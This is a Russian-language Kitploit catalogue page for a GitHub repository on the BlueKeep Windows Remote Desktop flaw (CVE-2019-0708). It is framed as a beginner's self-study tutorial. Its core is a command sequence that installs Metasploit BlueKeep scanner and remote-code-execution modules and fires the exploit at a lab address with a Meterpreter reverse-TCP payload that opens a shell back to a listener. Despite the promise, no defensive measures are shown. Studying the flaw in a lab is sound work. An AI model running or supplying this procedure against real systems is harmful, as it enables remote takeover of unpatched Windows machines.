Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2019-0708-Windows — Эта статья расскажет об уязвимости службы удалённого рабочего стола Windows (CVE-2019-0708) и подробно опишет данный баг и меры защиты. Автор, новичок в кибербезопасности, делится с вами базовыми учебными пособиями по самоподготовке — в основном онлайн-заметками о инструментах безопасности и практических действиях. Надеюсь, они вам понравятся. Также очень хочется, чтобы вы вместе со мной выполняли задания и прогрессировали; в дальнейшем мы углублённо изучим вопросы безопасности сетей и систем и поделимся соответствующими экспериментами. В общем, надеюсь, что эта серия статей будет полезна друзьям-блогерам. Писать статьи непросто, гуру, пожалуйста, не ругайтесь, если что не так, спасибо! | Kitploit
Инструменты/GitHubGitHub/eastmountyxz/cve-2019-0708-windows
Анализ уязвимостейЭксплуатацияТестирование на ПроникновениеОбучение и ОбразованиеРазработка Полезной НагрузкиЛаборатории и Практика
GitHubeastmountyxz/cve-2019-0708-windows

CVE-2019-0708-Windows

Репозиторий
52106 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →

Описание

Эта статья расскажет об уязвимости службы удалённого рабочего стола Windows (CVE-2019-0708) и подробно опишет данный баг и меры защиты. Автор, новичок в кибербезопасности, делится с вами базовыми учебными пособиями по самоподготовке — в основном онлайн-заметками о инструментах безопасности и практических действиях. Надеюсь, они вам понравятся. Также очень хочется, чтобы вы вместе со мной выполняли задания и прогрессировали; в дальнейшем мы углублённо изучим вопросы безопасности сетей и систем и поделимся соответствующими экспериментами. В общем, надеюсь, что эта серия статей будет полезна друзьям-блогерам. Писать статьи непросто, гуру, пожалуйста, не ругайтесь, если что не так, спасибо!

Поделиться

CVE-2019-0708-Windows

В этой статье будет рассмотрена уязвимость службы удаленного рабочего стола Windows (CVE-2019-0708), а также подробно объяснены сама уязвимость и меры защиты. Автор, будучи новичком в области кибербезопасности, делится с вами некоторыми базовыми уроками для самостоятельного изучения, в основном это онлайн-заметки об инструментах безопасности и практических операциях. Надеюсь, они вам понравятся. Кроме того, я надеюсь, что вы сможете вместе со мной выполнять эти действия и прогрессировать. В дальнейшем я буду углубленно изучать знания о кибербезопасности и системной безопасности и делиться соответствующими экспериментами. В общем, надеюсь, что эта серия статей будет полезна читателям. Написание статей дается нелегко, прошу гуру не критиковать, если что-то не так, спасибо!


Соответствующие блоги:
[Серия самообучения кибербезопасности] 58. Повторное изучение CVE-2019-0708 в Windows Exploitation и обратный шелл с помощью Metasploit
[Серия самообучения кибербезопасности] 44. Воспроизведение и подробное объяснение уязвимости службы удаленного рабочего стола Windows (CVE-2019-0708)


Основные команды:

root@kitploit:~
# Копирование файлов
cp ./rdp/rdp.rb /usr/share/metasploit-framework/lib/msf/core/exploit/
cp ./rdp/rdp_scanner.rb /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/
cp ./rdp/cve_2019_0708_bluekeep.rb /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/
cp ./rdp/cve_2019_0708_bluekeep_rce.rb /usr/share/metasploit-framework/modules/exploits/windows/rdp/

# Запуск инструмента
msfconsole
reload_all
search 0708

# Использование скрипта
use exploit/windows/rdp/cve_2019_0708_bluekeep_rce

# Просмотр информации
show options
show targets
info

# Установка адреса прослушивания, целевого адреса, полезной нагрузки, типа цели
set rhosts 192.168.44.132
set lhost 192.168.44.129
set rdp_client_ip 192.168.44.129
set payload windows/x64/meterpreter/reverse_tcp
unset RDP_CLIENT_NAME
set target 3

# Запуск скрипта
run
exploit

# Установка пропускной способности
Set GROOMSIZE 40

Ссылки:
[1] https://github.com/rapid7/metasploit-framework/pull/12283?from=groupmessage&isappinstalled=0
[2] https://github.com/n1xbyte/CVE-2019-0708

Скачать инструмент